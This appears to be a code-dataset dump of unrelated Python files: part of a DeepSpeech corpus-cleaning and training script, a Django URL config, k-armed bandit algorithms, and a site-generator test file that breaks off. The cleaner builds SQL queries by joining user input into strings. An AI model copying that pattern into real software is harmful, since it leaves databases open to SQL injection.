len(test_files) <= test:\n test_files.append(line)\n elif len(dev_files) <= test:\n dev_files.append(line)\n else:\n train_files.append(line)\n\n\n tools.printer(2,'all files', str(len(newlines)),True,model_path + 'info/training.txt')\n tools.printer(2,'train files', str(len(train_files)),True,model_path + 'info/training.txt')\n tools.printer(2,'test files', str(len(test_files)),True,model_path + 'info/training.txt')\n tools.printer(2,'dev files', str(len(dev_files)),True,model_path + 'info/training.txt')\n # add all sentences \n tools.create_file(tri_sentences,model_path + \"clean\")\n tools.create_file(tri_sentences,model_path + \"info/cleaned_sentences\")\n tools.create_file(dropped,model_path + \"info/dropped_sentences\")\n tools.create_file(newlines,model_path + \"all.csv\")\n tools.create_file(dev_files,model_path + \"dev.csv\")\n tools.create_file(train_files,model_path + \"train.csv\")\n tools.create_file(test_files,model_path + \"test.csv\")\n\n\n\n\n if args.notrie == False:\n if create_trie() == False:\n tools.printer(9,'couldn\\'t create lm.binary and trie', language_data[0])\n 
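            # (added annotation) create_trie() shells out to
            # toolbox/make_trie.sh "<deepspeech_dir>" "<model_path>" 3 and then
            # checks that <model_path>/trie exists; reaching this branch means
            # the script did not produce it, hence the -nt escape hatch below.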
tools.printer(8,'use -nt to skip lm.binary /trie creation', language_data[0])\n return False\n\n\n\n\n # array with arguments for start_train.sh\n raw_conf = \"earlystop_nsteps,train_batch_size,dev_batch_size,test_batch_size,n_hidden,learning_rate,dropout_rate,display_step,epoch,validation_step,decoder_library_path,batch_size,n_steps,summary_secs,dropout_rate2,dropout_rate3,dropout_rate4,dropout_rate5,dropout_rate6,relu_clip,early_stop,estop_mean_thresh,estop_std_thresh,beam_width,lm_weight,beta1,beta2,epsilon,valid_word_count_weight,limit_train,limit_dev,limit_test,export_batch_size,use_seq_length,log_level,max_to_keep \"\n splits = raw_conf.split(',')\n\n # get argument values from db\n main_db[1].execute(\"select \" + str(raw_conf) + \" from configs where name='\" + str('default') + \"'\")\n index = 0\n raw_conf = main_db[1].fetchall()\n config = []\n\n \n # set right pathes\n varis = '\\n\\n\\nlm_trie_path=\"' + model_path + 'trie\" \\nlm_binary_path=\"' + model_path + 'lm.binary\" \\ncheckpoint_dir=\"' + model_path + 'checkpoints\" \\nexport_dir=\"' + model_path + 'model_export\"\\nalphabet=\"' + model_path + 'alphabet.txt' + '\"\\ntest=\"' + model_path + 'test.csv' + '\"\\ndev=\"' + model_path + 'dev.csv' + '\"\\ntrain=\"' + model_path + 'train.csv' + '\"'\n\n\n cmd = '\\n\\n\\ncd \"' + str(deepspeech_dir[0]) + '\"\\n\\npython3 DeepSpeech.py --lm_trie_path \"$lm_trie_path\" --lm_binary_path \"$lm_binary_path\" --checkpoint_dir \"$checkpoint_dir\" --export_dir \"$export_dir\" --alphabet_config_path \"$alphabet\" --train_files \"$train\" --dev_files \"$dev\" --test_files \"$test\"'\n\n # determine value types and add them\n for conf in raw_conf[0]:\n value = str(conf).strip()\n\n conf = str(splits[index]).strip()\n config.append([conf,value])\n if re.compile(r'[a-zA-Z]+').search(value):\n \n if value == 'True' or value == 'False' or re.compile(r'1e-').search(value):\n varis += '\\n' + conf + '=' + value + ''\n cmd += ' --' + conf + ' $' + conf + ''\n else:\n varis += '\\n' + conf + '=\"' + value + '\"'\n cmd += ' --' + conf + ' \"$' + conf + '\"'\n else:\n varis += '\\n' + conf + '=' + value + ''\n cmd += ' --' + conf + ' $' + conf + ''\n index += 1\n\n varis += cmd\n tools.printer(-4,varis,'',True,model_path + 'start_train.sh',True,False)\n\n\n tools.printer(-3)\n if args.notrie == True:\n tools.printer(8,'path for your own trie/lm.binary',model_path)\n tools.printer(0,'otherwise trainings script wont work\\n')\n tools.printer(2,'start training with')\n tools.printer(-1,' ↓ ')\n tools.printer(-1,'bash \"' + model_path + 'start_train.sh\"')\n\n\n return True\n\n\n\ndef create_trie():\n clean = checking_clean_corpora()\n if clean == False:\n return False\n\n\n\n raw_sentences = []\n clean_path = language_path + 'clean_raw'\n clean_model = model_path + \"clean\"\n file_cleaner(clean_path,clean_model)\n crawler.sort_remove_duplicates(clean_model)\n tools.printer(0,'\\n -----------------------------------------\\n creating trie and lm.binary\\n\\n\\n','')\n os.system('bash toolbox/make_trie.sh \"' + str(deepspeech_dir[0]) + '\" \"' + str(model_path) + '\" ' + str('3'))\n if os.path.isfile(model_path + 'trie') == False:\n return False\n else:\n return True\n\n\n\ndef clean_sentences(all_sentences,deep_create=False,analyze=False):\n\n # get overall statistics\n if analyze == True:\n sizes = [] \n durations = [] \n wordcounts = [] \n words_sec = [] \n letters = [] \n letters_sec = [] \n\n if all_sentences[0] == 0: # 0 - array of sentences\n set_sentences = all_sentences[1]\n elif 
all_sentences[0] == 1: # 1 - sql query \n query = create_query()\n main_db[1].execute(\"SELECT dataset,wav_path,size,text,duration,wordcount,lettercount,lettersec,wordsec from audios where \" + str(query) + \"\")\n data = main_db[1].fetchall()\n set_sentences = data\n\n counter = len(set_sentences)\n \n\n index = 0\n failer = 0\n success = 0\n cleaned = ''\n cleaned_sentences = []\n cleaned_raw = []\n dropped = []\n datasets = []\n show_index = round(counter/20)\n for set_s in set_sentences: \n\n if index % show_index == 0:\n tools.printer(0,'[' + str(round((index/counter)*100,2)) + '%]',str(index) + '/' + str(counter))\n if deep_create == True:\n text = set_s[3] \n data_dir = str(set_s[1])\n if os.path.isfile(data_dir) == False:\n cleaned = False\n\n else:\n text = set_s \n\n\n\n if args.noclean == False:\n cleaned = alphabet.sentences_cleaner(prepare,str(text),language_data[0],args.upper,num_activ,args.lower)\n else:\n cleaned = str(text).replace('\\n',' ')\n if args.upper == False:\n cleaned = cleaned.lower()\n\n if cleaned == False: \n failer += 1\n dropped.append(str(text))\n else:\n success += 1 \n if analyze == True:\n if set_s[0] in datasets:\n pass\n else:\n datasets.append(set_s[0])\n sizes.append(set_s[2]) \n durations.append(set_s[4]) \n wordcounts.append(set_s[5]) \n letters.append(set_s[6]) \n letters_sec.append(set_s[7]) \n words_sec.append(set_s[8]) \n\n if deep_create == True:\n cleaned_sentences.append(data_dir + ',' + str(set_s[2]) + ',' + cleaned)\n cleaned_raw.append(str(cleaned))\n else:\n cleaned_sentences.append(str(cleaned)) \n\n\n\n\n index += 1\n\n print()\n\n # exit if no sentences\n if deep_create == True and len(cleaned_sentences) == 0:\n tools.printer(9,'no sentences found or all failed','')\n tools.printer(88,'try other parameters','')\n tools.printer(99,'python3 deepspeech_cleaner.py --help\" for help','')\n close_db(2,True)\n\n\n if analyze == True:\n tools.printer(11,'info:','',True,model_path + 'info/training.txt')\n tools.printer(2,'corpora','-'.join(datasets),True,model_path + 'info/training.txt') \n tools.get_size(sizes,'size',model_path + \"info/training.txt\")\n all_duration = tools.get_size(durations,'duration',model_path + \"info/training.txt\")\n all_words = tools.get_size(wordcounts,'words',model_path + \"info/training.txt\")\n all_letters = tools.get_size(letters,'letters',model_path + \"info/training.txt\")\n tools.printer(2,'words per sec',round(all_words/all_duration,2),True,model_path + 'info/training.txt')\n tools.printer(2,'letters per sec',round(all_letters/all_duration,2),True,model_path + 'info/training.txt')\n\n return [cleaned_sentences,cleaned_raw,dropped]\n\n\n\n\n\n\n\n\ndef multi_cleaner(inputs):\n if args.max < 1:\n args.max = 1\n\n index = 0\n startrange = inputs[0]\n endrange = inputs[1]\n\n failer = 0\n success = 0\n counter = endrange-startrange\n all_sentences = []\n show_index = 100000\n if inputs[4] == 0:\n show_index = round(counter/200)\n\n\n with open(inputs[2], 'r') as f:\n for text in f:\n if index >= startrange and index <= endrange:\n\n if args.noclean == False:\n cleaned = alphabet.sentences_cleaner(prepare,str(text),language_data[0],args.upper,num_activ,args.lower)\n else:\n cleaned = str(text)\n if args.upper == False:\n cleaned = cleaned.lower()\n\n\n\n\n if cleaned == False: \n failer += 1\n\n else:\n success += 1 \n all_sentences.append(str(cleaned))\n if index % show_index == 0 and inputs[4] == 0:\n\n tools.printer(0,'[' + str(round((index/counter)*100,2)) + '%]',)\n\n\n\n\n if len(all_sentences) > 
args.max:\n tools.create_file(all_sentences,inputs[3],'a')\n all_sentences = []\n\n\n\n \n index += 1\n \n f.close\n\n if len(all_sentences) > 0:\n tools.create_file(all_sentences,inputs[3],'a')\n\n \n\n \n\n\n\n\n\ndef file_cleaner(path,targetpath):\n counter = 0\n all_process = []\n\n with open(path, 'r') as f:\n for text in f:\n counter += 1\n\n cpus = get_process_count()\n\n \n steps = round(counter/cpus)\n start = 0\n end = 0\n current = 0\n for p in range(cpus):\n\n start = current\n current += steps\n\n if p+1 == cpus:\n end = counter\n else: \n end = current\n \n\n \n all_process.append([start,end,path,targetpath,p])\n\n\n tools.printer(2,'cleaning',path)\n tools.printer(2,' ',targetpath)\n tools.printer(2,'processing',cpus)\n with Pool(cpus) as p:\n return p.map(multi_cleaner, all_process)\n\n\n\n\n\n\n\n\n \n\n\ndef model_check():\n new_path = model_path\n new_model = current_model\n tools.printer(11,'training',new_model)\n if os.path.isdir(new_path) == True:\n tools.printer(8,'already trainings file for',new_model)\n u_input = tools.get_inputs([['d','delete and recreate',0],['c','choose another trainings name',0]],'',True,True)\n if u_input == 'd':\n tools.delete_all(new_path)\n elif u_input == 'c':\n while True:\n new_model = input(\" new name for training\\n\\n--:\")\n new_path = current_dir + '/languages/' + str(language_data[0]) + '/training/' + new_model + '/'\n if os.path.isdir(new_path) == False:\n break\n elif new_model in ['q','Q']:\n return [False]\n print()\n tools.printer(8,'already trainings file for',new_model)\n elif new_model in ['q','Q']:\n return [False]\n else:\n return [False]\n\n\n tools.create_folder(current_dir,new_model,'create',language_data[0])\n\n tools.printer(-3,'','',True,new_path + 'info/training.txt',True,False)\n return [True,new_model,new_path]\n\n\n\n \n\n\ndef create_clean_corpora(append=False):\n\n tools.printer(99,'need to download clean corpora')\n corporas = downloader.check_corpora(language_data,'[\\'0\\']',1)\n if len(corporas) == 0:\n tools.printer(8,'no clean corpora',str(language_data[0]))\n tools.printer(0,'trying to crawl one')\n tools.printer(-3)\n crawler.crawl_corpora(args.process,language_data[0],language_path,10,append)\n \n\n else:\n tools.printer(2,'downloading clean corpora','')\n downloader.download_clean(corporas[0][0],language_path)\n return True\n\n\ndef checking_clean_corpora():\n\n if os.path.isfile(language_path + 'clean_raw') == False:\n create_clean_corpora()\n else:\n\n clean_size = round(os.path.getsize(language_path + 'clean_raw')/1000000000,3)\n tools.printer(2,'found clean corpora')\n tools.printer(0,'size',str(clean_size) + 'GB')\n return True\n\n\n\n\ndef get_prepare():\n # array of replacer\n replacer = alphabet.get_replacer(language_data[0])\n # selected alphabet - upper/lower for regex\n if args.wordlength < 0:\n args.wordlength = 0\n\n alpha = alphabet.get_letters(language_data[0],args.upper,False,args.wordlength,args.numbers)\n return [alpha,replacer[0],replacer[1],args.numbers]\n\n\n\ndef get_process_count():\n cpus = args.process\n real_cpus = max(1, cpu_count() - 1)\n if cpus == 0 or cpus > real_cpus:\n cpus = real_cpus\n return cpus\n\ndef close_db(which=0,leave=False):\n if which == 0 or which == 1:\n language_data[4].close()\n if which == 0 or which == 2:\n main_db[0].close()\n\n if leave == True:\n tools.printer(-3)\n exit(1)\n\n\n\ndef error_flag():\n if sec_input == '':\n tools.printer(8,'no audio path')\n array = [tools.get_inputs([['wav_path','audio path from db',1],['audios_id','audio id from 
db',5]],'',True,True)]\n else:\n array = [sec_input]\n try:\n sql_test = \"select audios_id from audios where audios_id=\" + str(int(array[0])) + \"\"\n sql = \"update audios set errors=9 where wav_path=\" + str(int(array[0])) + \"\"\n except:\n\n\n sql_test = \"select audios_id from audios where wav_path='\" + str(array[0]) + \"'\"\n sql = \"update audios set errors=9 where wav_path='\" + str(array[0]) + \"'\"\n\n if str(array[0]) == 'unflag':\n tools.printer(22,'all errors are unflagged',array[0])\n main_db[1].execute('update audios set errors=0')\n main_db[0].commit()\n else:\n main_db[1].execute(sql_test)\n test = main_db[1].fetchall()\n if len(test) > 0:\n tools.printer(22,'error flagged',array[0])\n main_db[1].execute(sql)\n main_db[0].commit()\n else:\n tools.printer(9,'not found',array[0])\n\ndef test_sentences():\n if sec_input == '':\n tools.printer(8,'no test input')\n array = [tools.get_inputs([['','sentences or path',-1]],'',True,True)]\n\n if os.path.isfile(sec_input) == True:\n array = tools.get_file(sec_input,True)\n elif sec_input != '':\n array = [sec_input] \n\n print()\n for arr in array:\n cleaned = alphabet.sentences_cleaner(prepare,str(arr),language_data[0],args.upper,num_activ,args.lower)\n if cleaned == False: \n tools.printer(8,arr + '\\n')\n else:\n tools.printer(2, arr)\n tools.printer(22,cleaned + '\\n')\n\n\ndef start_download():\n corporas = tools.get_min_max(str(args.corpora),1)\n tools.printer(-3)\n tools.printer(1,'Downloader\\n')\n corporas = downloader.check_corpora(language_data,corporas,0)\n downloader.download(current_dir,language_path + 'datasets/' ,main_db,language_data[0],corporas)\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='DeepSpeech Dataset Downloader/Combiner/Cleaner')\n parser.add_argument('mode',help=\"\"\"\n download - [download corpora if available]------------\n crawl - [download/clean wiki dumps for lm.binary/trie]\n create - [create training files]----------------------\n insert - [insert corpus in db]------------------------\n convert - [convert audio files from database]---------\n trimm - [trimm all audio files start/end]-------------\n trimmsilence - [vad only start/end]-------------------\n clean_db - [delete all missing files in db]-----------\n save - [autosave arguments for each language on/off]--\n test - [test single sentence or file]-----------------\n error - [error flag audio files with path/id]---------\"\"\",nargs='+',type=str)\n\n parser.add_argument('-t','--training',help=\" path to model files [%(default)s]\", default='standard', type=str)\n parser.add_argument('-c','--corpora',help=\"which corpora - 0=all [0]\", default='default', type=str)\n parser.add_argument('-u','--upper',help=\"use upper and lowercase [False]\", default=False, type=bool)\n parser.add_argument('-n','--numbers',help=\"allow numbers [False]\", default=False, type=bool)\n parser.add_argument('-lo','--lower',help=\"replacer round to turn sentence to lowercase - only if -u/--upper=False [0]\", default=0, type=int)\n parser.add_argument('-l','--lang',help=\"available [it|hu|hr|pt|sv|fi|el|da|nn|lv|lt|bg|bs|sl|sk|is|en|uk|de|tr|ru|ro|es|fr|nl|pl|sq|cs|sr|et]\", default='default', type=str)\n parser.add_argument('-nc','--noclean',help=\"don't clean sentences\", default=False, type=bool)\n parser.add_argument('-nt','--notrie',help=\"no trie/lm.binary creation [False]\", default=False, type=bool)\n parser.add_argument('-s','--size',help=\"select min-max file size - 0=off [500-100000]\", default='default', 
type=str)\n parser.add_argument('-d','--duration',help=\"select min-max duration in sec - 0=off [1.5-9.9]\", default='default', type=str)\n parser.add_argument('-wc','--wordcount',help=\"select min-max words - 0=off [10-22]\", default='default', type=str)\n parser.add_argument('-ws','--wordsec',help=\"select min-max words per sec - 0=off [0.5-1.7]\", default='default', type=str)\n parser.add_argument('-wl','--wordlength',help=\"select minimum letters for a word - 0=off [0]\", default=0, type=int)\n parser.add_argument('-lc','--lettercount',help=\"select min-max letters - 0=off [10-22]\", default='default', type=str)\n parser.add_argument('-ls','--lettersec',help=\"select min-max letters per sec - 0=off [1.1-10.2]\", default='default', type=str)\n parser.add_argument('-b','--bitrate',help=\"select min-max bitrate - 0=off [8-16]\", default='default', type=str)\n parser.add_argument('-sa','--samplerate',help=\"select min-max samplerate - 0=off [16000-22000]\", default='default', type=str)\n parser.add_argument('-se','--sectors',help=\"select min-max sectors - 0=off [221-505]\", default='default', type=str)\n parser.add_argument('-ch','--channels',help=\"select min-max channels - 0=off [1-2]\", default='default', type=str)\n parser.add_argument('-uv','--upvotes',help=\"select min-max upvotes - 0=off [0-3]\", default='default', type=str)\n parser.add_argument('-dv','--downvotes',help=\"select min-max downvotes - 0=off [0-3]\", default='default', type=str)\n parser.add_argument('-cs','--convert_settings',help=\"change audio output settings [\\\"wav 16000 1 16 signed-integer\\\"]\", default='wav 16000 1 16 signed-integer', type=str)\n parser.add_argument('-ts','--trimm_settings',help=\"change audio trimm settings [\\\"0.5 0.5\\\"]\", default='default', type=str)\n parser.add_argument('-ps','--process',help=\"how many processes should be used - 0=one per cpu [0]\", default=0, type=int)\n parser.add_argument('-m','--max',help=\"max sentences in ram before writing to file [1000]\", default=1000, type=int)\n\n\n args = parser.parse_args()\n\n if len(args.mode) == 0:\n mode = 'help'\n else:\n mode = args.mode[0]\n\n if len(args.mode) == 1:\n sec_input = ''\n elif len(args.mode) > 1:\n sec_input = ' '.join(args.mode[1:])\n\n\n\n\n\n if mode == 'help':\n pass\n else:\n current_dir = tools.check_dir()\n language_data = alphabet.get_default_lang(args.lang,True)\n main_db = alphabet.get_db(language_data)\n deepspeech_dir = tools.check_deepspeech(language_data)\n if deepspeech_dir[0] == False:\n mode = '_'\n else:\n \n tools.printer(-3,'','')\n tools.printer(1,'Language',language_data[2])\n tools.printer(0,'',language_data[0])\n language_path = current_dir + '/languages/' + str(language_data[0]) + '/'\n # check if num2words got language support\n num_activ = alphabet.check_num2words(language_data[0])\n prepare = get_prepare()\n\n\n if mode == 'create':\n\n tools.printer(-3)\n tools.printer(1,'Creator\\n')\n sql_minmax = [['size',[]],['duration',[]],['bitrate',[]],['samplerate',[]],['channels',[]],['wordcount',[]],['wordsec',[]],['lettercount',[]],['lettersec',[]],['upvotes',[]],['downvotes',[]],['sectors',[]]]\n sql_tables = ['age','dataset','dialect','gender','speaker','text','wav_path']\n\n current_model = args.training\n model_path = current_dir + '/languages/' + str(language_data[0]) + '/training/' + current_model + '/'\n\n current_model = model_check()\n if current_model[0] == False:\n close_db(0,True)\n else:\n model_path = current_model[2]\n current_model = current_model[1]\n\n 
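        # (added annotation) Each numeric filter in sql_minmax (size,
        # duration, word/letter counts and rates, bitrate, samplerate, votes,
        # sectors, channels) is resolved through tools.get_min_max() from the
        # corresponding argument, logged to info/training.txt, and later
        # assembled by create_query() into the WHERE clause that selects
        # training audio from the database.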
tools.printer(11,'options:','',True,model_path + 'info/training.txt')\n for x in range(len(sql_minmax)):\n sql_minmax[x][1] = tools.get_min_max(eval('args.' + str(sql_minmax[x][0]) + ''),0,sql_minmax[x][0],language_data[3],model_path + 'info/training.txt',deepspeech_dir[1])\n\n\n language_data[4].commit()\n\n \n\n\n create_train_files()\n\n\n elif mode == 'error':\n error_flag()\n\n\n elif mode == 'insert':\n tools.printer(-3)\n tools.printer(1,'Inserter\\n')\n\n if sec_input == '':\n tools.printer(8,'no path selected','')\n corpus_path = tools.get_inputs([['','',2]],'enter corpus path',True,True)\n else:\n corpus_path = sec_input\n\n if corpus_path != False:\n tools.printer(2,'found path',str(corpus_path))\n downloader.insert_corpora(corpus_path,True,main_db,language_data[0])\n else:\n tools.printer(9,'path not found',str(corpus_path))\n\n\n\n\n\n elif mode == 'test' or mode == 'testing' :\n\n \n tools.printer(-3)\n tools.printer(1,'Replacement Tester\\n')\n test_sentences()\n\n \n elif mode == 'crawl':\n tools.printer(-3)\n tools.printer(1,'Crawler\\n')\n crawler.crawl_corpora(get_process_count(),language_data[0],language_path,20,False)\n tools.printer(1,'crawling complete')\n\n elif mode == 'convert' or mode == 'trimm' or mode == 'trimmsilence':\n tools.printer(-3)\n tools.printer(1,'Audio Transformer\\n')\n\n transformer.convert_all(mode,get_process_count(),main_db,args.convert_settings,args.trimm_settings)\n\n tools.printer(2,mode,'done')\n\n elif mode == 'download':\n start_download()\n elif mode == 'clean_db':\n alphabet.clean_database(main_db)\n\n\n elif mode == 'save':\n tools.autosave_toggle(language_data)\n\n\n elif mode == '_':\n tools.printer(11,'quit')\n pass\n else:\n\n\n parser.print_help()\n exit(1)\n\n\n\n close_db(0,True)\n\n\n","repo_name":"silenterus/deepspeech-cleaner","sub_path":"deepspeech_cleaner.py","file_name":"deepspeech_cleaner.py","file_ext":"py","file_size_in_byte":27244,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"21"} +{"seq_id":"3418250737","text":"from django.urls import path, include\n\nfrom .views import ProveedorView,ProveedorNew, ProveedorEdit, \\\n proveedorInactivar, ProveedorDel, ComprasView, compras, ComprasDetDelete\n\n\n\nurlpatterns = [\n path('proveedores/',ProveedorView.as_view(), name=\"proveedor_list\"),\n path('proveedores/new',ProveedorNew.as_view(), name=\"proveedor_new\"),\n path('proveedores/edit/',ProveedorEdit.as_view(), name=\"proveedor_edit\"),\n path('proveedores/inactivar/',proveedorInactivar, name=\"proveedor_inactivar\"),\n path('proveedores/delete/', ProveedorDel.as_view(), name='proveedor_del'),\n \n path('compras/',ComprasView.as_view(), name=\"compras_list\"),\n path('compras/new',compras, name='compras_new'),\n path('compras/edit/',compras, name=\"compras_edit\"),\n # path('proveedores/inactivar/',proveedorInactivar, name=\"proveedor_inactivar\"),\n # path('proveedores/delete/', ProveedorDel.as_view(), name='proveedor_del'),\n path('compras//delete/',ComprasDetDelete.as_view(), name=\"compras_del\"),\n]","repo_name":"eze-fayu/sistema-facturacion","sub_path":"app/cmp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15709538522","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_optimal_action(bandit):\n \"\"\"\n Returns the best action of a bandit.\n\n Args:\n bandit (list): Contains mean and std / reward for each k.\n\n 
Returns:\n int: Index of best action\n \"\"\"\n max_R = [sum(x) if isinstance(x, tuple) else x for x in bandit]\n return max_R.index(max(max_R))\n\n\ndef argmax(Q):\n \"\"\"\n Returns index of maximum Q. Breaks ties randomly.\n\n Args:\n Q (np.array): Q values for the different k.\n\n Returns:\n int: Index of maximum Q.\n \"\"\"\n return np.random.choice(np.flatnonzero(Q == Q.max()))\n\n\ndef get_probabilities_action(H):\n \"\"\"\n Computes the probabilities of selection given H.\n\n Args:\n H (np.array): Preference for each action.\n\n Returns:\n np.array: Probability vector.\n \"\"\"\n return np.exp(H) / np.sum(np.exp(H))\n\n\ndef run_bandit_gradient(bandit, num_steps, alpha, baseline=True):\n \"\"\"\n Computes the gradient bandit algorithm.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. \n num_steps (int): Total number of steps of the simulation. \n alpha (int): Weight of recent rewards.\n baseline (bool, optional): Use baseline rewards. Defaults to True.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n actions = range(k)\n H = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n R_mean = 0\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n prob = get_probabilities_action(H)\n idx = np.random.choice(actions, p=prob)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if baseline:\n R_mean += 1 / (iteration + 1) * (R[iteration] - R_mean)\n for action in actions:\n if action == idx:\n update = alpha * (R[iteration] - R_mean) * (1 - prob[action])\n H[action] += update if not np.isnan(update) else 0\n else:\n update = alpha * (R[iteration] - R_mean) * prob[action]\n H[action] -= update if not np.isnan(update) else 0\n return H, R, A\n\n\ndef run_bandit_ucb(bandit, num_steps, alpha=None, initial_values=None, c=1):\n \"\"\"\n Computes the Upper-Confidence-Bound action selection algorithm.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. \n num_steps (int): Total number of steps of the simulation. \n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n c (int, optional): Confidence bound parameter. Defaults to 1.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n N = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n action_upb = Q + c * np.sqrt(np.log(iteration) / N)\n action_upb[np.where(np.isnan(action_upb))] = np.inf\n idx = argmax(action_upb)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if alpha is None:\n N[idx] += 1\n Q[idx] += (1 / (N[idx])) * (R[iteration] - Q[idx])\n else:\n Q[idx] += alpha * (R[iteration] - Q[idx])\n return Q, R, A\n\n\ndef run_bandit_stat(bandit, num_steps, epsilon, alpha=None, initial_values=None):\n \"\"\"\n Runs the epsilon-greedy stationary problem.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. 
\n num_steps (int): Total number of steps of the simulation. \n epsilon (int): Probability of not selecting optimal action.\n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n N = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n if np.random.random() > epsilon:\n idx = argmax(Q == Q.max())\n else:\n idx = np.random.choice(k)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if alpha is None:\n N[idx] += 1\n Q[idx] += (1 / (N[idx])) * (R[iteration] - Q[idx])\n else:\n Q[idx] += alpha * (R[iteration] - Q[idx])\n return Q, R, A\n\n\ndef run_bandit_nonstat(k, num_steps, epsilon, alpha, initial_values=None):\n \"\"\"\n Runs the epislon-greedy nonstationary problem. Bandits are initialized at 0\n and are updated at each step.\n\n Args:\n k (int): Number of different actions in bandit.\n num_steps (int): Total number of steps of the simulation. \n epsilon (int): Probability of not selecting optimal action.\n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n bandit = [0 for idx in range(k)]\n for iteration in range(num_steps):\n if np.random.random() > epsilon:\n idx = argmax(Q == Q.max())\n else:\n idx = np.random.choice(k)\n R[iteration] = bandit[idx]\n best_action = get_optimal_action(bandit)\n A[iteration] = 1 if idx == best_action else 0\n Q[idx] += alpha * (R[iteration] - Q[idx])\n for idx in range(k):\n bandit[idx] += np.random.normal(0, 0.01)\n return Q, R, A\n\n\ndef plot_bandit_dist(bandit):\n \"\"\"\n Plots distribution of rewards for each k in bandit.\n\n Args:\n bandit (list): Contains mean and std / reward for each k.\n \"\"\"\n k = len(bandit)\n num_points = 10000\n data = np.zeros((num_points, k))\n actions = range(k)\n for action in actions:\n mean, std = bandit[action]\n data[:, action] = np.random.normal(mean, std, size=(num_points, ))\n plt.figure(figsize=(7, 5))\n plt.violinplot(data, positions=actions)\n plt.plot(np.mean(data, axis=0), '.r', markersize=10)\n plt.xlabel(\"Action\", fontsize=12)\n plt.xticks(actions)\n plt.legend([r\"$q_*$\"], fontsize=12)\n plt.ylabel(\"Reward distribution\", fontsize=12)\n plt.show()\n","repo_name":"sgalella/kArmedBandit","sub_path":"k_armed_bandit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42971300483","text":"import pathlib\n\nimport pluggy\nimport pytest\nfrom jinja2 import FileSystemLoader\n\nfrom render_engine.collection import Collection\nfrom render_engine.page import Page\nfrom render_engine.site 
import Site\n\npm = pluggy.PluginManager(\"fake_test\")\n\n\ndef test_site_defaults():\n \"\"\"\n Tests that a site can be created with default variables.\n Those values are:\n - SITE_TITLE: \"Untitled Site\"\n - SITE_URL: \"http://example.com\"\n \"\"\"\n\n site = Site()\n\n assert site.site_vars[\"SITE_TITLE\"] == \"Untitled Site\"\n assert site.site_vars[\"SITE_URL\"] == \"http://localhost:8000/\"\n\n\ndef test_site_site_vars_orrider_defaults_via_class():\n \"\"\"\n Tests that a site can be created with default variables.\n \"\"\"\n\n site = Site()\n site_vars = {\n \"SITE_TITLE\": \"My Site\",\n \"SITE_URL\": \"https://my-site.com\",\n }\n\n site.site_vars = site_vars\n\n assert site.site_vars[\"SITE_TITLE\"] == \"My Site\"\n assert site.site_vars[\"SITE_URL\"] == \"https://my-site.com\"\n\n\ndef test_site_page_in_route_list(tmp_path):\n tmp_dir = tmp_path / \"content\"\n tmp_dir.mkdir()\n file = tmp_dir / \"test.md\"\n file.write_text(\"test\")\n\n site = Site()\n\n # assert that the route list is empty\n assert len(site.route_list) == 0\n\n class CustomPage(Page):\n test_value = \"test\"\n content_path = file.absolute()\n\n site.page(CustomPage)\n\n assert site.route_list[\"custompage\"].test_value == \"test\"\n\n\ndef test_site_collection_in_route_list():\n \"\"\"Tests that when a collection is added to the route_list it is only the colleciton\"\"\"\n site = Site()\n\n # assert that the route list is empty\n assert len(site.route_list) == 0\n\n class CustomPage1(Page):\n pass\n\n\n class CustomPage2(Page):\n pass\n\n class collection(Collection):\n pages = [CustomPage1(), CustomPage2()]\n\n collection = site.collection(collection)\n\n assert site.route_list[\"collection\"] == collection\n assert len(site.route_list) == 1\n assert 'custompage1' in [getattr(page, page._reference) for page in site.route_list[\"collection\"]]\n\n\ndef test_site_page_with_multiple_routes_has_one_entry_in_routes_list():\n \"\"\"Tests a page with multiple routes only has one entry in the routes list\"\"\"\n site = Site()\n\n class CustomPage(Page):\n test_value = \"test\"\n routes = [\"customroute\", 